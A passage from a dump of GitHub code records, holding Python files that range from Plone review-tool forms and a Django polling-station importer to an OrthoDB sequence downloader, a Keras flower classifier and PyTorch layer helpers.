)\n )\n\n if chat.portal_type.lower() == 'commentanswer':\n document.add_paragraph(\n '< %s' % self.strip_special_chars(chat.text)\n )\n document.add_paragraph(\n \"From Member State To TERTs \\t\\t %s\" % (\n sent_info % date.strftime('%d %b %Y, %H:%M CET')\n )\n )\n\n return document\n\n def render(self):\n \"\"\" Export current filters observation in xls\n \"\"\"\n document = self.build_file()\n\n response = self.request.response\n response.setHeader(\n \"content-type\",\n (\"application/vnd.openxmlformats-officedocument\"\n \".wordprocessingml.document\")\n )\n response.setHeader(\n \"Content-disposition\",\n \"attachment;filename=\" + self.context.getId() + \".docx\"\n )\n\n f = StringIO()\n document.save(f)\n f.seek(0)\n response.setHeader('Content-Length', len(f.getvalue()))\n response.write(f.getvalue())\n\n\nclass AddQuestionForm(Form):\n\n ignoreContext = True\n fields = field.Fields(IComment).select('text')\n\n @button.buttonAndHandler(u'Save question')\n def create_question(self, action):\n context = aq_inner(self.context)\n text = self.request.form.get('form.widgets.text', '')\n if not text.strip():\n raise ActionExecutionError(Invalid(u\"Question text is empty\"))\n\n qs = self.context.get_values_cat('Question')\n if qs:\n question = qs[0]\n else:\n q_id = context.invokeFactory(\n type_name='Question',\n id='question-1',\n title='Question 1',\n )\n question = context.get(q_id)\n\n id = str(int(time()))\n item_id = question.invokeFactory(\n type_name='Comment',\n id=id,\n )\n comment = question.get(item_id)\n comment.text = text\n\n return self.request.response.redirect(context.absolute_url())\n\n def updateWidgets(self):\n super(AddQuestionForm, self).updateWidgets()\n self.widgets['text'].rows = 15\n\n def updateActions(self):\n super(AddQuestionForm, self).updateActions()\n for k in self.actions.keys():\n self.actions[k].addClass('standardButton')\n self.actions[k].addClass('defaultWFButton')\n\n\nclass AddAnswerForm(Form):\n\n ignoreContext = True\n fields = field.Fields(ICommentAnswer).select('text')\n\n @button.buttonAndHandler(u'Save answer')\n def add_answer(self, action):\n text = self.request.form.get('form.widgets.text', '')\n if not text.strip():\n raise ActionExecutionError(Invalid(u\"Answer text is empty\"))\n observation = aq_inner(self.context)\n questions = [\n q for q in observation.values()\n if q.portal_type == 'Question'\n ]\n if questions:\n context = questions[0]\n else:\n raise ActionExecutionError(Invalid(u\"Invalid context\"))\n id = str(int(time()))\n item_id = context.invokeFactory(\n type_name='CommentAnswer',\n id=id,\n )\n comment = context.get(item_id)\n comment.text = text\n action = 'add-answer'\n api.content.transition(obj=context, transition=action)\n\n return self.request.response.redirect(observation.absolute_url())\n\n def updateWidgets(self):\n super(AddAnswerForm, self).updateWidgets()\n self.widgets['text'].rows = 15\n\n def updateActions(self):\n super(AddAnswerForm, self).updateActions()\n for k in self.actions.keys():\n self.actions[k].addClass('standardButton')\n\n\nclass AddAnswerAndRequestComments(BrowserView):\n def render(self):\n observation = aq_inner(self.context)\n questions = [\n q for q in observation.values()\n if q.portal_type == 'Question'\n ]\n if questions:\n context = questions[0]\n else:\n raise ActionExecutionError(Invalid(u\"Invalid context\"))\n\n comments = [q for q in context.values() if q.portal_type == 'Comment']\n answers = [\n q for q in context.values()\n if q.portal_type == 'CommentAnswer'\n ]\n\n if (len(comments) == len(answers)):\n status = IStatusMessage(self.request)\n msg = _(u'There is a draft answer created for the question.')\n status.addStatusMessage(msg, \"error\")\n return self.request.response.redirect(observation.absolute_url())\n\n context = questions[0]\n\n text = (\n u'For MS coordinator: please draft, edit and finalize '\n u'here your answer AFTER CLOSING COMMENT within your '\n u'member state expert.'\n )\n\n id = str(int(time()))\n item_id = context.invokeFactory(\n type_name='CommentAnswer',\n id=id,\n )\n comment = context.get(item_id)\n comment.text = text\n\n action = 'assign-answerer'\n url = '%s/assign_answerer_form?workflow_action=%s&comment=%s' % (\n context.absolute_url(), action, item_id)\n\n return self.request.response.redirect(url)\n\n\ndef create_comment(text, question):\n id = str(int(time()))\n item_id = question.invokeFactory(type_name='Comment', id=id)\n comment = question.get(item_id)\n comment.text = text\n return comment\n\n\ndef value_or_error(value, err_text):\n if not value:\n raise ActionExecutionError(Invalid(err_text))\n return value\n\n\nclass AddCommentForm(Form):\n\n ignoreContext = True\n fields = field.Fields(IComment).select('text')\n\n @button.buttonAndHandler(u'Add question')\n def create_question(self, action):\n request = self.request\n observation = self.context\n # raising errors before transition as that will\n # cause a transaction.commit\n question = value_or_error(\n observation.get_question(),\n u'Invalid context'\n )\n wid_text = self.widgets['text']\n\n text = value_or_error(\n wid_text.extract(u'').strip(),\n u'Question text is empty'\n )\n\n if question.get_status() == 'closed': # fix for question in \"draft\"\n # transition before adding the comment,\n # so the transition guard passes\n api.content.transition(\n obj=question,\n transition='add-followup-question'\n )\n create_comment(text, question)\n\n return request.response.redirect(observation.absolute_url())\n\n def updateWidgets(self):\n super(AddCommentForm, self).updateWidgets()\n self.widgets['text'].rows = 15\n\n def updateActions(self):\n super(AddCommentForm, self).updateActions()\n for k in self.actions.keys():\n self.actions[k].addClass('standardButton')\n\n\nclass EditConclusionP2AndCloseComments(BrowserView):\n def update(self):\n # Some checks:\n waction = self.request.get('workflow_action')\n if waction != 'finish-comments':\n status = IStatusMessage(self.request)\n msg = u'There was an error, try again please'\n status.addStatusMessage(msg, \"error\")\n\n def render(self):\n # Execute the transition\n api.content.transition(\n obj=self.context,\n transition='finish-comments'\n )\n conclusions = self.context.get_values_cat('Conclusions')\n conclusion = conclusions[0]\n url = '%s/edit' % conclusion.absolute_url()\n return self.request.response.redirect(url)\n\n\nclass EditHighlightsForm(edit.DefaultEditForm):\n def updateFields(self):\n super(EditHighlightsForm, self).updateFields()\n self.fields = field.Fields(IObservation).select('highlight')\n self.fields['highlight'].widgetFactory = CheckBoxFieldWidget\n self.groups = [\n g for g in self.groups\n if g.label == 'label_schema_default'\n ]\n\n def updateWidgets(self):\n super(EditHighlightsForm, self).updateWidgets()\n self.widgets['highlight'].template = Z3ViewPageTemplateFile(\n 'templates/widget_highlight.pt'\n )\n\n\nclass AddConclusions(BrowserView):\n def render(self):\n context = aq_inner(self.context)\n conclusions_folder = self.context.get_values_cat('Conclusions')\n\n if conclusions_folder:\n conclusions = conclusions_folder[0]\n url = conclusions.absolute_url() + '/edit'\n\n else:\n url = '{}/++add++Conclusions'.format(context.absolute_url())\n\n return self.request.response.redirect(url)\n","repo_name":"eea/emrt.necd.content","sub_path":"emrt/necd/content/observation.py","file_name":"observation.py","file_ext":"py","file_size_in_byte":71258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7577800406","text":"#\ndef gradingAlgorithm(n):\n if n < 38:\n return n\n else:\n if n%5 > 2:\n return (n+5-n%5)\n else:\n return n\ndef gradingStudents(grades):\n # Write your code here\n rounded = []\n for grade in grades:\n rounded.append(gradingAlgorithm(grade))\n return rounded","repo_name":"kmb21/Hackerank","sub_path":"Python/Grading.py","file_name":"Grading.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"25954952178","text":"from django.contrib.gis.geos import Point\nfrom data_collection.management.commands import BaseXpressDemocracyClubCsvImporter\n\n\nclass Command(BaseXpressDemocracyClubCsvImporter):\n council_id = \"E06000005\"\n addresses_name = (\n \"parl.2019-12-12/Version 1/Democracy_Club__12December2019darling.tsv\"\n )\n stations_name = (\n \"parl.2019-12-12/Version 1/Democracy_Club__12December2019darling.tsv\"\n )\n elections = [\"parl.2019-12-12\"]\n csv_delimiter = \"\\t\"\n allow_station_point_from_postcode = False\n\n def station_record_to_dict(self, record):\n\n if record.polling_place_id == \"5634\": # The Reading Room\n rec = super().station_record_to_dict(record)\n rec[\"location\"] = Point(-1.49308179, 54.48766450, srid=4326)\n return rec\n\n return super().station_record_to_dict(record)\n\n def address_record_to_dict(self, record):\n rec = super().address_record_to_dict(record)\n uprn = record.property_urn.strip().lstrip(\"0\")\n\n if uprn == \"10013318194\": # Suspicious postcode\n return None\n\n if uprn in [\n \"10013315063\", # DL14EP -> DL14ER : Willow Green Care Home, Eastbourne Road, Darlington\n \"200002723491\", # DL22XJ -> DL22UF : Elm Bank Cottage, Houghton Bank, Heighington (Part)\n ]:\n rec[\"accept_suggestion\"] = True\n\n if uprn in [\n \"10013312294\", # DL13JU -> DL21RL : Little Burdon Farm, Sadberge\n \"10013312299\", # DL13JU -> DL21RL : Little Burdon Farm Cottage, Sadberge\n \"200002722478\", # DL13LA -> DL13LB : Orchard House, The Green, Brafferton\n \"100110749824\", # DL21QB -> DL21QG : Ivy House, Snipe Lane, Hurworth\n \"100110718839\", # DL21QB -> DL22SA : Blackwell Moor Farm, Snipe Lane, Hurworth\n \"10013315658\", # DL37LU -> DL11TZ : Managers Accommodation, 17 Post House Wynd, Darlington\n ]:\n rec[\"accept_suggestion\"] = False\n\n return rec\n","repo_name":"mbateman/UK-Polling-Stations","sub_path":"polling_stations/apps/data_collection/management/commands/import_darlington.py","file_name":"import_darlington.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"34926349656","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 10 14:35:47 2019\r\n\r\n@author: Habibullah\r\n\"\"\"\r\n\r\nimport os\r\nimport zipfile\r\nimport random\r\nimport tensorflow as tf\r\nfrom tensorflow import lite\r\nfrom tensorflow.keras.optimizers import RMSprop\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.preprocessing import image\r\nfrom shutil import copyfile\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nlocal_zip = 'flower_photos.zip'\r\nzip_ref = zipfile.ZipFile(local_zip,'r')\r\nzip_ref.extractall(\"C:/Users/Habibullah/Desktop/Leaves Recognition\")\r\nzip_ref.close()\r\n\r\n\r\nliste = [\"daisy\",\"dandelion\",\"roses\",\"sunflowers\",\"tulips\"]\r\n \r\n\r\ntry :\r\n os.mkdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/training\")\r\n os.mkdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/testing\")\r\n\r\nexcept OSError :\r\n pass\r\n\r\nfor variety in liste :\r\n try :\r\n os.mkdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/training/\" + variety)\r\n os.mkdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/testing/\" + variety)\r\n except OSError :\r\n pass\r\n\r\n#Örnek 2 klasör görüntüleyelim.\r\n \r\n#print(len(os.listdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/leaf_uci/training/Acer negundo\")))\r\n#print(len(os.listdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/leaf_uci/testing/Acer palmatum\")))\r\n \r\ndef split_data(SOURCE, TRAINING,TESTING,SPLIT_SIZE) :\r\n files = []\r\n for filename in os.listdir(SOURCE) :\r\n file = SOURCE + filename\r\n if os.path.getsize(file) > 0 :\r\n files.append(filename)\r\n else :\r\n print(filename + \"is zero length, so ignoring\")\r\n\r\n training_length = int(len(files) * SPLIT_SIZE)\r\n testing_length = int(len(files) - training_length)\r\n shuffled_set = random.sample(files,len(files))\r\n training_set = shuffled_set[0:training_length]\r\n testing_set = shuffled_set[-testing_length:]\r\n \r\n for filename in training_set :\r\n this_file = SOURCE + filename\r\n destination = TRAINING + filename\r\n copyfile(this_file,destination)\r\n \r\n for filename in testing_set :\r\n this_file = SOURCE + filename\r\n destination = TESTING + filename\r\n copyfile(this_file,destination)\r\n\r\nsplit_size = .8\r\n\r\nfor name in liste :\r\n SOURCE_DIR = \"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/\" + name + \"/\"\r\n TRAINING_DIR = \"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/training/\" + name + \"/\"\r\n TESTING_DIR = \"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/testing/\" + name + \"/\"\r\n \r\n split_data(SOURCE_DIR,TRAINING_DIR,TESTING_DIR,split_size)\r\n\r\nTRAINING_DIR = \"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/training/\"\r\ntraining_datagen = ImageDataGenerator(\r\n rescale = 1./255,\r\n rotation_range=40,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\n\r\ntraining_generator = training_datagen.flow_from_directory(\r\n TRAINING_DIR,\r\n target_size = (300,300),\r\n class_mode = \"categorical\")\r\n\r\nTESTING_DIR = \"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/testing/\"\r\ntesting_datagen = ImageDataGenerator(rescale = 1./255)\r\n\r\ntesting_generator = testing_datagen.flow_from_directory(\r\n TESTING_DIR,\r\n target_size = (300,300),\r\n class_mode = \"categorical\")\r\n\r\n\r\nmodel = tf.keras.models.Sequential([\r\n tf.keras.layers.Conv2D(64, (3,3), activation = \"relu\", input_shape = (300,300,3)),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n tf.keras.layers.Conv2D(64, (3,3), activation = \"relu\"),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n tf.keras.layers.Conv2D(128, (3,3), activation = \"relu\"),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n tf.keras.layers.Conv2D(128, (3,3), activation = \"relu\"),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n \r\n tf.keras.layers.Flatten(),\r\n tf.keras.layers.Dropout(0.5),\r\n tf.keras.layers.Dense(1024, activation = \"relu\"),\r\n tf.keras.layers.Dense(5, activation = \"softmax\")\r\n ])\r\n \r\nmodel.summary()\r\n\r\nmodel.compile(loss = \"categorical_crossentropy\", optimizer = RMSprop(lr=0.001), metrics = ['accuracy'])\r\n\r\nhistory = model.fit_generator(training_generator,\r\n epochs = 35,\r\n validation_data = testing_generator,\r\n verbose = 1)\r\n\r\nacc=history.history['acc']\r\nval_acc=history.history['val_acc']\r\nloss=history.history['loss']\r\nval_loss=history.history['val_loss']\r\n\r\nepochs=range(len(acc))\r\n\r\nplt.plot(epochs, acc, 'r', \"Training Accuracy\")\r\nplt.plot(epochs, val_acc, 'b', \"Validation Accuracy\")\r\nplt.title('Training and validation accuracy')\r\nplt.figure()\r\n\r\nplt.plot(epochs, loss, 'r', \"Training Loss\")\r\nplt.plot(epochs, val_loss, 'b', \"Validation Loss\")\r\nplt.figure()\r\n\r\n\r\nkeras_file=\"flower.h5\"\r\nmodel.save(keras_file)\r\nconverter=lite.TocoConverter.from_keras_model_file(keras_file)\r\ntflite_model=converter.convert()\r\nopen(\"cnn.tflite\",\"wb\").write(tflite_model)\r\n\r\n\r\nmodel.load_weights(\"flower.h5\")\r\npath = \"C:/Users/Habibullah/Desktop/Leaves Recognition/daisy.jpeg\"\r\nimg=image.load_img(path,target_size=(300,300))\r\nx=image.img_to_array(img)\r\nx=np.expand_dims(x, axis=0)\r\nimages = np.vstack([x])\r\nsonuc = model.predict(images, batch_size=10)\r\nprint(sonuc[0])\r\nprint(np.argmax(sonuc))\r\na=np.argmax(sonuc)\r\nprint(a)\r\nif a==0:\r\n print(\"it is a daisy\")\r\nif a==1:\r\n print(\"it is a dandelion\")\r\nif a==2:\r\n print(\"it is a rose\")\r\nif a==3:\r\n print(\"it is a sunflower\")\r\nif a==4:\r\n print(\"it is a tulips\")\r\n\r\n\r\n","repo_name":"HabibullahMetin/FlowerRecognition","sub_path":"flower_recognition_files/flower_recognition.py","file_name":"flower_recognition.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"32517010900","text":"def rob(values:list, n:int):\r\n if n == 0:\r\n return values[n]\r\n if n < 0:\r\n return 0\r\n \r\n pick = values[n] + rob(values, n - 2)\r\n notPick = rob(values, n - 1)\r\n return max(pick, notPick)\r\nhouses = [2, 7, 9, 3, 1]\r\nmaxValue = rob(houses, len(houses) - 1)\r\nprint(maxValue)","repo_name":"DrakeF2000/CoolStuff","sub_path":"House Robber.py","file_name":"House Robber.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9462831179","text":"import pandas as pd\nimport csv\nimport os\nfrom biothings_client import get_client\nimport mygene\nimport requests\nimport ast\nimport math\nimport numpy as np\nfrom threading import Thread, RLock\nimport queue\nfrom source.utils.tools import find_pattern, function_in_thread\nfrom source.utils.sequence import is_metazoan, find_sequence\n\n\nlock = RLock()\n\n\nclass fill_csv(Thread):\n def __init__(self, group_acc_seq,uniprot_id_list,\n pattern, mt, path, writer, resp):\n Thread.__init__(self)\n self.group_acc_seq = group_acc_seq\n self.uniprot_id_list = uniprot_id_list\n self.pattern = pattern\n self.mt = mt\n self.path = path\n self.writer = writer\n self.resp = resp\n\n def run(self):\n for i, (acc, group) in enumerate(self.group_acc_seq):\n print(\"import %s from csv file\" % acc)\n with requests.Session() as s:\n if acc not in self.uniprot_id_list:\n pos_list = []\n seq_list = []\n que = queue.Queue()\n # Info from gene\n r = (self.resp).loc[[acc]]\n geneID = None\n taxID = None\n\n if \"_id\" in r:\n geneID = r[\"_id\"].values[0]\n if \"taxid\" in r:\n taxID = r[\"taxid\"].values[0]\n metazoan = is_metazoan(taxID, self.mt)\n clusterID = function_in_thread(que, [acc,\n geneID,\n self.path,\n s],\n request_cluster_id)\n name = \"%s.fasta\" % acc\n path2fastas = \"%s/fastas\" % self.path\n path2cluster = \"%s/%s\" % (path2fastas, name)\n sequence = function_in_thread(que, [path2cluster,\n group[\"seq_in_window\"].tolist(),\n taxID], find_sequence)\n if sequence != \"None\":\n for position, seq in zip(group[\"position\"], group[\"seq_in_window\"]):\n match = function_in_thread(que, [seq, sequence], find_pattern)\n tmp_position = None\n if len(match):\n for r in match:\n if tmp_position is None:\n dist = len(sequence) + 1\n else:\n dist = abs(tmp_position - position)\n if dist > abs(6 + r.start() - position):\n tmp_position = 6 + r.start()\n position = tmp_position\n else:\n position = None\n if position not in pos_list and position is not None:\n pos_list.append(position)\n seq_list.append(seq)\n\n with lock:\n if len(pos_list):\n (self.writer).writerow([acc, geneID, taxID, metazoan, self.pattern, seq_list,\n pos_list, clusterID, sequence])\n\n\ndef import_csv(csv):\n df = pd.read_csv(csv, sep=\"\\t\", header=None)\n df.columns = [\n 'prot_name',\n 'acc',\n 'position',\n 'type',\n 'pmids',\n 'database',\n 'code',\n 'tpm',\n 'seq_in_window'\n ]\n # Convert data into category\n for cat in df.columns:\n if cat != \"position\":\n df[cat] = df[cat].astype('category')\n return df\n\n\ndef request_gene_id(geneID, s):\n request = 'http://www.orthodb.org/search?query=%s&ncbi=1' \\\n '&singlecopy=1&limit=1&universal=1' % geneID\n response = s.get(request)\n if response.status_code == 200:\n return response.json()\n else:\n print(\"status code for %s = %s\" % (request, response.status_code))\n return None\n\n\ndef uniprotid_to_geneid(uniprotid_list):\n mg = mygene.MyGeneInfo()\n if len(uniprotid_list):\n return mg.querymany(uniprotid_list, scope='symbol,accession',\n fields='uniprot, taxid', species=\"all\", as_dataframe=True)\n else:\n return []\n\n\ndef request_ortho_db(s, id, ncbi, path2file):\n request_odb = 'http://www.orthodb.org/fasta?query=%s&ncbi=%s' % (id, ncbi)\n resp = s.get(request_odb)\n if resp.status_code == 200:\n content = resp.content.decode(\"ascii\")\n try:\n ast.literal_eval(content)\n except:\n request_api = 'wget \\'%s\\' -O %s' % (request_odb, path2file)\n os.system(request_api)\n return True\n else:\n print(\"status code for %s = %s\" % (request_odb, resp.status_code))\n return False\n\n\ndef request_cluster_id(acc, geneID, path, s):\n cluster_id = \"nan\"\n name = \"%s.fasta\" % acc\n path2fastas = \"%s/fastas\" % path\n path2file = \"%s/%s\" % (path2fastas, name)\n os.makedirs(path2fastas, exist_ok=True)\n downloaded = False\n if not os.path.exists(path2file):\n downloaded = request_ortho_db(s, acc, 0, path2file)\n if geneID is not None:\n if not downloaded and not math.isnan(float(geneID)):\n downloaded = request_ortho_db(s, geneID, 1, path2file)\n if downloaded or os.path.exists(path2file):\n cluster_id = acc\n return cluster_id\n\n\ndef import_ortholog(csv_file, pattern, nthread):\n print(\"Parsing csv\")\n\n if os.path.exists(\"%s/data\" % os.path.dirname(csv_file)):\n path = \"%s/data\" % os.path.dirname(csv_file)\n else:\n path = os.path.dirname(os.path.dirname(csv_file))\n file_name = os.path.basename(csv_file)\n os.makedirs(\"%s/csv/%s\" % (path, pattern), exist_ok=True)\n index_file = '%s/csv/%s/index_%s_%s.csv' % (path, pattern, file_name[:-4], pattern)\n df = import_csv(csv_file)\n mt = get_client(\"taxon\")\n\n print(\"Extracting %s phosphorylation site\" % pattern)\n\n uniprot_id_list = []\n if os.path.exists(index_file) and os.path.getsize(index_file) > 0:\n index_df = pd.read_csv(index_file, sep=';')\n uniprot_id_list = index_df[\"uniprotID\"].value_counts().keys().tolist()\n\n print(\"Preparing queries\")\n uniprot_to_convert = set(df[\"acc\"].tolist()) - set(uniprot_id_list)\n resp = uniprotid_to_geneid(uniprot_to_convert)\n\n sub_df = df[df[\"acc\"].isin(list(uniprot_to_convert))]\n sub_df.reset_index()\n with open(index_file, 'a+', newline='') as g:\n writer = csv.writer(g, delimiter=\";\")\n g.seek(0)\n first_char = g.read(1)\n if not first_char:\n writer.writerow(['uniprotID', 'geneID', 'taxID', 'metazoan', 'code',\n 'seq_in_window', 'pos_sites', 'clusterID', 'sequence'])\n\n group_acc_seq = sub_df.groupby([\"acc\"], observed=True)\n data_thread = np.array_split(group_acc_seq, nthread)\n thread_list = []\n for data in data_thread:\n thread_list.append(fill_csv(data, uniprot_id_list,\n pattern, mt, path, writer, resp))\n for thread in thread_list:\n thread.start()\n for thread in thread_list:\n thread.join()\n return index_file\n","repo_name":"ZoeBrunet/phosphorylation_prediction","sub_path":"source/dataset/import_csv.py","file_name":"import_csv.py","file_ext":"py","file_size_in_byte":7593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"12303675625","text":"import pytest\nfrom graph.graph import Graph\nfrom graph.graph_business_trip import business_trip\n\ng = Graph()\npandora = g.add_vertex('Pandora')\narendelle = g.add_vertex('Arendelle')\nmetroville = g.add_vertex('Metroville')\nmonstroplolis = g.add_vertex('Monstroplolis')\nnarnia = g.add_vertex('Narnia')\nnaboo = g.add_vertex('Naboo')\n\ng.add_edge(pandora, metroville, 82)\ng.add_edge(pandora, arendelle, 150)\ng.add_edge(arendelle, metroville, 99)\ng.add_edge(arendelle, monstroplolis, 42)\ng.add_edge(metroville, monstroplolis, 105)\ng.add_edge(metroville, narnia, 37)\ng.add_edge(metroville, naboo, 26)\ng.add_edge(monstroplolis, naboo, 73)\ng.add_edge(narnia, naboo, 250)\n\n\ndef test_no_trip():\n \"\"\"\n Test case for the business_trip function when there is no trip between cities.\n \"\"\"\n actual = business_trip(g, [narnia, arendelle, naboo])\n expected = None\n assert actual == expected\n\n\ndef test_with_trip():\n \"\"\"\n Test case for the business_trip function when there is a trip between cities.\n \"\"\"\n actual = business_trip(g, [narnia, naboo, monstroplolis])\n expected = 323\n assert actual == expected\n\n\ndef test_one_city():\n \"\"\"\n Test case for the business_trip function when there is only one city in the trip.\n \"\"\"\n actual = business_trip(g, [narnia])\n expected = 0\n assert actual == expected\n","repo_name":"mshnas9/data-structures-and-algorithms","sub_path":"graph/tests/test_business_trip.py","file_name":"test_business_trip.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31152868946","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.autograd import Variable\r\nimport numpy as np\r\nimport torchvision.models as models\r\nimport random\r\n\r\nclass Lambda(nn.Module):\r\n def __init__(self, lambda_fn):\r\n super().__init__()\r\n self.lambda_fn = lambda_fn\r\n\r\n def forward(self, x):\r\n return self.lambda_fn(x)\r\n\r\n\r\nclass Flatten(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def forward(self, x): \r\n return x.view(x.shape[0], -1)\r\n\r\nclass layer_normalization(nn.Module):\r\n\r\n def __init__(self, features, epsilon=1e-8):\r\n '''Applies layer normalization.\r\n Args:\r\n epsilon: A floating number. A very small number for preventing ZeroDivision Error.\r\n '''\r\n super(layer_normalization, self).__init__()\r\n self.epsilon = epsilon\r\n self.gamma = nn.Parameter(torch.ones(features))\r\n self.beta = nn.Parameter(torch.zeros(features))\r\n\r\n def forward(self, x):\r\n mean = x.mean(-1, keepdim=True)\r\n std = x.std(-1, keepdim=True)\r\n return self.gamma * (x - mean) / (std + self.epsilon) + self.beta\r\n\r\ndef conv_relu(in_channels, out_channels, kernel_size=3, stride=1,\r\n padding=1, bias=True):\r\n return [\r\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, \r\n stride=stride, padding=padding, bias=bias),\r\n nn.ReLU(inplace=True),\r\n ]\r\n\r\ndef conv_bn_relu(in_channels, out_channels, kernel_size=3, stride=1, \r\n padding=1, bias=False):\r\n return [\r\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size,\r\n stride=stride, padding=padding, bias=bias),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU(inplace=True),\r\n ]\r\n\r\ndef linear_bn_relu_drop(in_channels, out_channels, dropout=0.5, bias=False):\r\n layers = [\r\n nn.Linear(in_channels, out_channels, bias=bias),\r\n nn.BatchNorm1d(out_channels),\r\n nn.ReLU(inplace=True)\r\n ]\r\n if dropout > 0:\r\n layers.append(nn.Dropout(dropout))\r\n return layers\r\n\r\n\r\ndef conv_1x1_bn(inp, oup):\r\n return nn.Sequential(\r\n nn.Conv2d(in_channels=inp, out_channels=oup, kernel_size=1, stride=1, padding=0, bias=False),\r\n nn.BatchNorm2d(num_features=oup, eps=1e-05, momentum=0.1, affine=True),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\ndef conv_bn(inp, oup, stride):\r\n return nn.Sequential(\r\n nn.Conv2d(in_channels=inp, out_channels=oup, kernel_size=3, stride=stride, padding=1, bias=False),\r\n nn.BatchNorm2d(num_features=oup, eps=1e-05, momentum=0.1, affine=True),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\ndef up_pooling(in_channels, out_channels, kernel_size=2, stride=2):\r\n return nn.Sequential(\r\n nn.ConvTranspose2d(in_channels, out_channels, kernel_size=kernel_size, stride=stride),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\nclass ChannelAttention(nn.Module):\r\n\r\n def __init__(self, inplanes, reduction_ratio = 16):\r\n super(ChannelAttention, self).__init__()\r\n self.avgpool = nn.AdaptiveAvgPool2d(1) # Output size of 1x1xC\r\n self.fc = nn.Sequential(\r\n nn.Linear(inplanes, inplanes // reduction_ratio),\r\n nn.ReLU(),\r\n nn.Linear(inplanes // reduction_ratio, inplanes),\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, x):\r\n batch_size, num_channels, _, _ = x.size()\r\n y = self.avgpool(x).view(batch_size, num_channels)\r\n y = self.fc(y).view(batch_size, num_channels, 1, 1)\r\n return x * y\r\n\r\ndef conv3x3(in_planes, out_planes, stride=1, has_bias=False):\r\n \"3x3 convolution with padding\"\r\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\r\n padding=1, bias=has_bias)\r\n\r\n\r\ndef conv3x3_bn_relu(in_planes, out_planes, stride=1):\r\n return nn.Sequential(\r\n conv3x3(in_planes, out_planes, stride),\r\n SynchronizedBatchNorm2d(out_planes),\r\n nn.ReLU(inplace=True),\r\n )\r\n\r\nclass AdaptiveConcatPool2d(nn.Module):\r\n def __init__(self, sz=None):\r\n super().__init__()\r\n sz = sz or (1, 1)\r\n self.ap = nn.AdaptiveAvgPool2d(sz)\r\n self.mp = nn.AdaptiveMaxPool2d(sz)\r\n\r\n def forward(self, x):\r\n return torch.cat([self.mp(x), self.ap(x)], 1)\r\n\r\n\r\nclass GlobalAvgPool2d(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def forward(self, x):\r\n h, w = x.shape[2:]\r\n return nn.functional.avg_pool2d(\r\n input=x,\r\n kernel_size=(h, w))\r\n\r\n\r\nclass GlobalMaxPool2d(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def forward(self, x):\r\n h, w = x.shape[2:]\r\n return nn.functional.max_pool2d(\r\n input=x,\r\n kernel_size=(h, w))\r\n\r\n\r\nclass GlobalConcatPool2d(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.avg = GlobalAvgPool2d()\r\n self.max = GlobalMaxPool2d()\r\n\r\n def forward(self, x):\r\n return torch.cat([self.avg(x), self.max(x)], 1)\r\n\r\n\r\ndef get_fc(in_feat, n_classes, activation=None):\r\n layers = [\r\n nn.Linear(in_features=in_feat, out_features=n_classes)\r\n ]\r\n if activation is not None:\r\n layers.append(activation)\r\n return nn.Sequential(*layers)\r\n\r\n\r\ndef get_classifier(in_feat, n_classes, activation, p=0.5):\r\n layers = [\r\n nn.BatchNorm1d(num_features=in_feat),\r\n nn.Dropout(p),\r\n nn.Linear(in_features=in_feat, out_features=n_classes),\r\n activation\r\n ]\r\n return nn.Sequential(*layers)\r\n\r\n\r\ndef get_mlp_classifier(in_feat, out_feat, n_classes, activation, p=0.01, p2=0.5):\r\n layers = [\r\n nn.BatchNorm1d(num_features=in_feat),\r\n nn.Dropout(p),\r\n nn.Linear(in_features=in_feat, out_features=out_feat),\r\n nn.ReLU(),\r\n nn.BatchNorm1d(num_features=out_feat),\r\n nn.Dropout(p2),\r\n 